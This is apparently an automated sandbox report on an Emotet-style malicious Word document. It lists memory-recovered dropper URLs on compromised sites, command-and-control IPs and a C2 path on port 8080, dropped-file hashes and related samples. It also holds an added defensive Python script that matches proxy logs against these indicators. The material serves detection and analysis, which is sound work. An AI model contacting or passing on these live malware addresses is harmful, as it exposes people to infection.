http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp | false | | high
http://www.windows.com/pctv. | rundll32.exe, 00000009.00000002.2112546062.0000000001F40000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp | false | | high
http://3musketeersent.net/wp-includes/TUgD/ | powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://www.icra.org/vocabulary/. | rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000005.00000002.2105195514.0000000002210000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2112633522.0000000002980000.00000002.00000001.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000005.00000002.2104262504.0000000000134000.00000004.00000020.sdmp | false | | high
https://skilmu.com/wp-admin/hQVlB8b/ | powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://jeevanlic.com/wp-content/r8M/ | powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://dashudance.com/thinkphp/dgs7Jm9/ | powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://shannared.com | powershell.exe, 00000005.00000002.2109838810.0000000003A46000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://investor.msn.com/ | rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp | false | | high
http://www.piriform.com/ccleaner | powershell.exe, 00000005.00000002.2104262504.0000000000134000.00000004.00000020.sdmp | false | | high
http://www.%s.comPA | powershell.exe, 00000005.00000002.2105195514.0000000002210000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2112633522.0000000002980000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/ | powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp | false | | high
http://leopardcranes.com/zynq-linux-yaayf/w/ | powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown

                                        Contacted IPs


                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
217.160.169.110 | unknown | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
51.255.203.164 | unknown | France | 16276 | OVHFR | true
84.232.229.24 | unknown | Romania | 8708 | RCS-RDS73-75DrStaicoviciRO | true
192.169.223.13 | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
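The network section above gives two classes of indicator: the seven dropper URLs the macro carried (recovered from powershell.exe memory) and the C2 endpoints the unpacked payload used (the :8080 URL and the four contacted IPs). Note that Avira URL Cloud rated four of the seven dropper URLs and the :8080 C2 URL "safe" while the sandbox marked them malicious, so a block list built from reputation verdicts alone would miss most of this campaign. The following is an added example, not part of the report: it turns the indicators listed on this page into an exact-match and host-match lookup and runs it over constructed proxy log lines. The log format, the client addresses, the labels and the non-80 port heuristic are this example's own assumptions.

```python
"""Match proxy or firewall log lines against the network indicators in this report."""
import re
from urllib.parse import urlsplit

# Indicators copied from the report. The seven dropper URLs were recovered from
# powershell.exe memory; the :8080 URL is the C2 request made by the unpacked
# payload; the IPs are the report's Contacted IPs. Labels are this example's own.
DROPPER_URLS = [
    "http://shannared.com/content/lhALeS/",
    "http://3musketeersent.net/wp-includes/TUgD/",
    "https://skilmu.com/wp-admin/hQVlB8b/",
    "http://jeevanlic.com/wp-content/r8M/",
    "http://dashudance.com/thinkphp/dgs7Jm9/",
    "http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/",
    "http://leopardcranes.com/zynq-linux-yaayf/w/",
]
C2_URLS = ["http://217.160.169.110:8080/zrm2/7son14/mlqmfbi2uji6/"]
C2_IPS = {"217.160.169.110", "51.255.203.164", "84.232.229.24", "192.169.223.13"}

IOC_HOSTS = {}  # hostname -> label (weak: any path on that host)
IOC_PATHS = {}  # (hostname, path) -> label (strong: exact request)


def _register(url, label):
    parts = urlsplit(url)
    host = parts.hostname.lower()
    IOC_HOSTS.setdefault(host, label)
    IOC_PATHS[(host, parts.path)] = label


for _u in DROPPER_URLS:
    _register(_u, "emotet-dropper")
for _u in C2_URLS:
    _register(_u, "emotet-c2")

RAW_IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def classify_url(url):
    """Return (label, reason) for a requested URL, or None when nothing matches.

    Order matters: an exact host+path hit is the strongest evidence, a host-only
    hit is weaker (same compromised site, different path), a bare C2 IP matches
    whatever path the beacon used, and plain HTTP to a raw IP on a port other
    than 80 is only a heuristic (this sample's C2 listens on 8080).
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if not host:
        return None
    if (host, parts.path) in IOC_PATHS:
        return IOC_PATHS[(host, parts.path)], "exact path match"
    if host in IOC_HOSTS:
        return IOC_HOSTS[host], "host match, different path"
    if host in C2_IPS:
        return "emotet-c2", "known C2 IP"
    port = parts.port or (443 if parts.scheme == "https" else 80)
    if parts.scheme == "http" and port != 80 and RAW_IPV4.fullmatch(host):
        return "suspect", "plain HTTP to raw IP on port %d" % port
    return None


# Assumed "timestamp client method url status" layout; adapt to your proxy format.
LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


def scan_log(lines):
    """Return one finding per log line whose URL matches an indicator."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        verdict = classify_url(m["url"])
        if verdict:
            hits.append({"ts": m["ts"], "client": m["client"], "url": m["url"],
                         "label": verdict[0], "reason": verdict[1]})
    return hits


# Constructed log lines (not from the report): two benign URLs that also occur
# in the report's memory strings, plus requests shaped like this sample's.
SAMPLE_LOG = [
    "2021-01-26T13:32:49Z 10.0.0.5 GET http://shannared.com/content/lhALeS/ 200",
    "2021-01-26T13:32:50Z 10.0.0.5 GET http://www.msnbc.com/news/ticker.txt 200",
    "2021-01-26T13:33:02Z 10.0.0.5 POST http://217.160.169.110:8080/zrm2/7son14/mlqmfbi2uji6/ 200",
    "2021-01-26T13:33:10Z 10.0.0.7 GET https://skilmu.com/wp-admin/ 404",
    "2021-01-26T13:33:15Z 10.0.0.7 POST http://84.232.229.24:7080/ 200",
    "2021-01-26T13:33:20Z 10.0.0.9 GET http://203.0.113.9:8080/update/ 200",
    "2021-01-26T13:33:25Z 10.0.0.9 GET https://www.windows.com/pctv 200",
]

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print("%(ts)s %(client)s %(label)-15s %(reason)s  %(url)s" % h)
```

The host-only tier is deliberate: Emotet dropper URLs live on compromised WordPress sites, so a second request to the same host with a different path (a retry, or a later wave reusing the site) is still worth an alert even though the exact path has changed. The raw-IP heuristic will fire on some legitimate internal services; keep it as a low-severity rule or scope it to egress traffic.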

                                        General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 344339
Start date: 26.01.2021
Start time: 13:32:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 8s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Arch_2021_717-1562532.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDOC@28/8@1/4
EGA Information:
• Successful, ratio: 88.9%
HDC Information:
• Successful, ratio: 7.9% (good quality ratio 5.9%)
• Quality average: 60.1%
• Quality standard deviation: 37.7%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
• TCP Packets have been reduced to 100
• Execution Graph export aborted for target powershell.exe, PID 2564 because it is empty
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

Time | Type | Description
13:32:42 | API Interceptor | 1x Sleep call for process: msg.exe modified
13:32:43 | API Interceptor | 48x Sleep call for process: powershell.exe modified
13:32:50 | API Interceptor | 488x Sleep call for process: rundll32.exe modified

                                        Joe Sandbox View / Context

                                        IPs

Match: associated sample name / URL, detection, and the context (URL or IP) seen in that earlier analysis.

217.160.169.110
• Exce.dll: malicious

84.232.229.24
• Notice 8283393_829.doc: malicious (84.232.229.24/ozrf6dcy5j/7k5jvcfnl1c/ccmrg6oyv4nizx6/)
• MENSAJE.doc: malicious (84.232.229.24/v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/)
• MENSAJE.doc: malicious (84.232.229.24/40hbu1ld1mxg/gbxh6m/w00gy5ya8o03k/)
• MES-2021_01_22-3943960.doc: malicious (84.232.229.24/yy5pra4h/)
• Documento 2201 01279.doc: malicious (84.232.229.24/6zji6l/)
• DATI 2021.doc: malicious (84.232.229.24/hu5n7nnlfn8qzz44/4teiln75sss0k/j8fl359hk405/rlm4iik5i1da/3l3lpmieamhaykhkk/)
• informazioni 536-32772764.doc: malicious (84.232.229.24/o6p3ixr1vo/0nwr6v/oxpej1lly6ntbn4xn2/x9kd6qn1qdqyq/d0lxoj4a8vrn/)
• Meddelelse-58931636.doc: malicious (84.232.229.24/m4mfruuzgu2ajo8qu7t/bl7ktqi5zlffcg/x8ofu4so7/loe8ts1l0p5/nzne9gz6/76ki44u754xsh/)
• doc_2201_3608432.doc: malicious (84.232.229.24/jcmzbwn9r7yck/wlh8myw/)
• 13-2021.doc: malicious (84.232.229.24/g4fo4/gsc17oaf9ynv0wo/670mqqf8vrds/5wmsg3x72r/mh2sm8tbg/2jp5a8m51xtysk3vljn/)
• MAIL-224201 277769577.doc: malicious (84.232.229.24/nef4co7lnfc9omq/gcs3bqsea9h/by1c/ujdlxj02m6twsi0q/5qqr6ck1fl34uz4g8l/tck4x5pqu8pykii6lbl/)

192.169.223.13
• Notice 8283393_829.doc: malicious (shannared.com/content/lhALeS/)
• MPbBCArHPF.exe: malicious (www.zante2020.com/de92/?ofutZl=LJRLKBSy6grrtpsJhG02GrYQIWz0ACN12l1WS7OpcnRH7cIC7TbO0nH4HvapdKvK3MkbU2/Law==&00GP-0=Lho4HDB0q2fdJ)
• 5DY3NrVgpI.exe: malicious (www.zante2020.com/de92/?FdC4E2D=LJRLKBSy6grrtpsJhG02GrYQIWz0ACN12l1WS7OpcnRH7cIC7TbO0nH4HvapdKvK3MkbU2/Law==&AjR=9r4L1)
• DEBIT NOTE_ PZU000147200.exe: malicious (www.signpartnerpro.com/6bu2/?ElS=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAzecGlgx6T+D&Qtr=KnSlEX8p2LY)
• SWIFT USD 354,883.00.exe: malicious (www.signpartnerpro.com/6bu2/?DjU4Hl=gbG8jNk0zBv&YL0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAze2ZVQx+R2D)
• SAWR000148651.exe: malicious (www.signpartnerpro.com/6bu2/?u6u0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAze2ZVQx+R2D&9r4l2=xPJtQXiX)
• DEBIT NOTE-1C017A.exe: malicious (www.signpartnerpro.com/6bu2/?Cjs0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAzecGlgx6T+D&al4=aV50jnQxv4qp0f)
• Unode.exe: malicious (www.electwatman.com/gtb/?t6A8=BSvxnM/FatY3MVaHvUsc2bSEp39whkHRVvBzdyZiJhALHrd8voDBQHL8OFVR1zdRJwYw&9r4l2=xPGHVlS8)
• http://ambiancemedicalspa.com/application/orcle.php: malicious (ambiancemedicalspa.com/application/favicon.ico)

                                          Domains

Match: associated sample name / URL, detection, and the context (IP) seen in that earlier analysis.

shannared.com
• Notice 8283393_829.doc: malicious (192.169.223.13)

                                          ASN

Match: associated sample name / URL, detection, and the context (IP) seen in that earlier analysis.

OVHFR
• Document_PDF.exe: malicious (51.195.53.221)
• SecuriteInfo.com.Variant.Zusy.363976.21086.exe: malicious (54.39.198.228)
• ARCH 05 2_80074.doc: malicious (144.217.190.240)
• PO NO 214000070.doc: malicious (94.23.169.237)
• pol.doc: malicious (94.23.169.237)
• RFQ 20210125.doc: malicious (94.23.169.237)
• REQUEST FOR QUOTATION.doc: malicious (94.23.169.237)
• BANK DETAILS.doc: malicious (94.23.169.237)
• PO NO -214000070.doc: malicious (94.23.169.237)
• SecuriteInfo.com.Generic.mg.b70d9bf0d6567964.dll: malicious (158.69.118.130)
• SecuriteInfo.com.Artemis5EFC4C46397A.dll: malicious (158.69.118.130)
• SecuriteInfo.com.Generic.mg.75b2def6a7e110ad.dll: malicious (158.69.118.130)
• SecuriteInfo.com.Generic.mg.32d178838c0fd41b.dll: malicious (158.69.118.130)
• SecuriteInfo.com.Artemis8353855AD729.dll: malicious (158.69.118.130)
• SecuriteInfo.com.Generic.mg.b817172e5515b1af.dll: malicious (158.69.118.130)
• SecuriteInfo.com.ArtemisAA8578417627.dll: malicious (158.69.118.130)
• SecuriteInfo.com.Artemis58690C2E2BCA.dll: malicious (158.69.118.130)
• SecuriteInfo.com.ArtemisTrojan.dll: malicious (158.69.118.130)
• SecuriteInfo.com.Generic.mg.0551f32bbe68c20b.dll: malicious (158.69.118.130)
• SecuriteInfo.com.Artemis961F6F63FB8F.dll: malicious (158.69.118.130)

RCS-RDS73-75DrStaicoviciRO
• bin.sh: malicious (5.14.105.137)
• Notice 8283393_829.doc: malicious (84.232.229.24)
• MENSAJE.doc: malicious (84.232.229.24)
• MENSAJE.doc: malicious (84.232.229.24)
• MES-2021_01_22-3943960.doc: malicious (84.232.229.24)
• Documento 2201 01279.doc: malicious (84.232.229.24)
• DATI 2021.doc: malicious (84.232.229.24)
• informazioni 536-32772764.doc: malicious (84.232.229.24)
• Meddelelse-58931636.doc: malicious (84.232.229.24)
• doc_2201_3608432.doc: malicious (84.232.229.24)
• 13-2021.doc: malicious (84.232.229.24)
• MAIL-224201 277769577.doc: malicious (84.232.229.24)
• Arch_05_222-3139.doc: malicious (5.2.136.90)
• MENSAJE 2021.doc: malicious (5.2.136.90)
• Documento_0501_012021.doc: malicious (5.2.136.90)
• Datos_019_9251.doc: malicious (5.2.136.90)
• document_84237-299265042.doc: malicious (5.2.136.90)
• ARCH-012021-21-1934.doc: malicious (5.2.136.90)
• Mensaje K-158701.doc: malicious
                                          • 5.2.136.90
                                          Datos-2021-4-377562.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          ONEANDONE-ASBrauerstrasse48DEBestellung.docGet hashmaliciousBrowse
                                          • 212.227.200.73
                                          N00048481397007.docGet hashmaliciousBrowse
                                          • 212.227.200.73
                                          N00048481397007.docGet hashmaliciousBrowse
                                          • 212.227.200.73
                                          MENSAJE.docGet hashmaliciousBrowse
                                          • 212.227.200.73
                                          MENSAJE.docGet hashmaliciousBrowse
                                          • 212.227.200.73
                                          Archivo_AB-96114571.docGet hashmaliciousBrowse
                                          • 212.227.200.73
                                          5390080_2021_1-259043.docGet hashmaliciousBrowse
                                          • 212.227.200.73
                                          5390080_2021_1-259043.docGet hashmaliciousBrowse
                                          • 212.227.200.73
                                          GV52H7XsQ2.exeGet hashmaliciousBrowse
                                          • 217.76.142.246
                                          Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                          • 74.208.236.161
                                          13-2021.docGet hashmaliciousBrowse
                                          • 88.208.252.128
                                          mallware.exeGet hashmaliciousBrowse
                                          • 212.227.15.142
                                          Messaggio 2001 2021 3-4543.docGet hashmaliciousBrowse
                                          • 88.208.252.128
                                          sLUAeV5Er6.exeGet hashmaliciousBrowse
                                          • 74.208.236.196
                                          SecuriteInfo.com.Trojan.PackedNET.507.23078.exeGet hashmaliciousBrowse
                                          • 74.208.236.121
                                          SCAN_52858535.docGet hashmaliciousBrowse
                                          • 88.208.252.128
                                          QtEQhJpxAt.exeGet hashmaliciousBrowse
                                          • 216.250.120.149
                                          1tqW2LLr74.exeGet hashmaliciousBrowse
                                          • 217.160.0.94
                                          PAP001.exeGet hashmaliciousBrowse
                                          • 212.227.15.158
                                          PO-RY 001-21 Accuri.jarGet hashmaliciousBrowse
                                          • 217.160.0.179

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6528223-1CF8-4E74-AA78-05F4F57053A0}.tmp
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1024
                                          Entropy (8bit):0.05390218305374581
                                          Encrypted:false
                                          SSDEEP:3:ol3lYdn:4Wn
                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                          Malicious:false
                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E52EFAE2-E64E-47DE-AFA9-74F75F545893}.tmp
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1536
                                          Entropy (8bit):1.3586208805849456
                                          Encrypted:false
                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbh:IiiiiiiiiifdLloZQc8++lsJe1Mzgl
                                          MD5:48AC909EB7F8D8BEABCD794C602AAAA6
                                          SHA1:044A7BB11F83B4D4F48D139ACBCBBB24F3E57071
                                          SHA-256:FF7A863D84CAD97CB083EBC8CE73B745B8C5775369BDBEB9A87184FB2EC6C21F
                                          SHA-512:8EE8FA5B09C7653CE716039093B7A0CDB1D0E59CEF547D292A4943D51676513EA5120C9A673B42FC5E52CB8611325C4D53C24E20C3F489FAA850290A856C3F99
                                          Malicious:false
                                          Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Arch_2021_717-1562532.LNK
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Tue Jan 26 20:32:39 2021, length=175616, window=hide
                                          Category:dropped
                                          Size (bytes):2138
                                          Entropy (8bit):4.506414517804054
                                          Encrypted:false
                                          SSDEEP:48:8U/XTFGqV6tXh7PxuKl4Qh2U/XTFGqV6tXh7PxuKl4Q/:8U/XJGqV6nA+4Qh2U/XJGqV6nA+4Q/
                                          MD5:3DF534EC80F3C85FA76714DB4292A786
                                          SHA1:C6596785338E721E83AE53A1713F291F520E1774
                                          SHA-256:77528ECB6AFA7D2107028B55354F4F7AD70CA81FBF541EB8C946AD6F92B6CFB6
                                          SHA-512:45FF10CFB6846FAF5D2B9A556D5CB2D7F44D63F83C402D967EB76772EA8370AF25E29C1BF1ED0991ADD4EEA0DFECDFE1F35A674FF711FE96D239ACED6304A4F7
                                          Malicious:false
                                          Preview: L..................F.... ....k...{...k...{...P..*................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2.....:R.. .ARCH_2~1.DOC..`.......Q.y.Q.y*...8.....................A.r.c.h._.2.0.2.1._.7.1.7.-.1.5.6.2.5.3.2...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\701188\Users.user\Desktop\Arch_2021_717-1562532.doc.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.r.c.h._.2.0.2.1._.7.1.7.-.1.5.6.2.5.3.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......701188.........
                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):101
                                          Entropy (8bit):4.393650502691884
                                          Encrypted:false
                                          SSDEEP:3:M1yU5LI19C8X7U5LI19CmX1yU5LI19Cv:M1JAQJgJ9
                                          MD5:61CF076A207D61DD7CFDFF72AFC003B1
                                          SHA1:E5EB1D15A681CBD472A5DF144C48E9CED0F974F9
                                          SHA-256:48C3B72F2DA19C13AF0067FFFD8DB45539F934BEA6F11942C2619BD6A2DB1FA6
                                          SHA-512:38E9B97416C9AC7831DAEF8589D09DBFF79133DEC1A88AB5206188AD6A6373BD67D74E0179CB5EF898FB7A23E53B12E8181BA2BFD23965254CE73C18AFBB0EB4
                                          Malicious:false
                                          Preview: [doc]..Arch_2021_717-1562532.LNK=0..Arch_2021_717-1562532.LNK=0..[doc]..Arch_2021_717-1562532.LNK=0..
                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162
                                          Entropy (8bit):2.431160061181642
                                          Encrypted:false
                                          SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                          MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                          SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                          SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                          SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                          Malicious:false
                                          Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XU9O8G9A8UDMPEGZGHPP.temp
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):8016
                                          Entropy (8bit):3.578544938206285
                                          Encrypted:false
                                          SSDEEP:96:chQCsMqLVqvsqvJCwoo4z8hQCsMqLVqvsEHyqvJCwore4zvVYL+H74f8ObdlUVqG:cy8obz8yIHnortzvCf8OYIu
                                          MD5:E1114DE40553EDCA03926BA0A011A227
                                          SHA1:8F1C315F170DF90D8B5FFA086FCB2BE434D5F415
                                          SHA-256:6AC06135063C5F088190B1A144512162BDBFDA8E4635B157E6386EDE56DBD9F8
                                          SHA-512:EA88FD7B61D0A03352D40A26503B4378193036B1EA1D8DD21A8F2F2F80A035EA7311C65BE6BDE78CE57E55E04D3001D897DD9DD8444952E228B2540A5CC27380
                                          Malicious:false
                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                          C:\Users\user\Desktop\~$ch_2021_717-1562532.doc
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162
                                          Entropy (8bit):2.431160061181642
                                          Encrypted:false
                                          SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                          MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                          SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                          SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                          SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                          Malicious:false
                                          Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                          C:\Users\user\Kaktksw\An6othh\N49I.dll
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):631808
                                          Entropy (8bit):6.9127096471964675
                                          Encrypted:false
                                          SSDEEP:12288:OYzchQVZnkmt/70MWugxPJZFpf0c1pH/bdJ8CA88fzsBsI3+Dc:B4KV5Hpt8bZHLp+CSfasO+
                                          MD5:E09F65C1A92653035B27E603980CB205
                                          SHA1:78DCA7A2190C82DC8DC4A0EAC302379804C79AA9
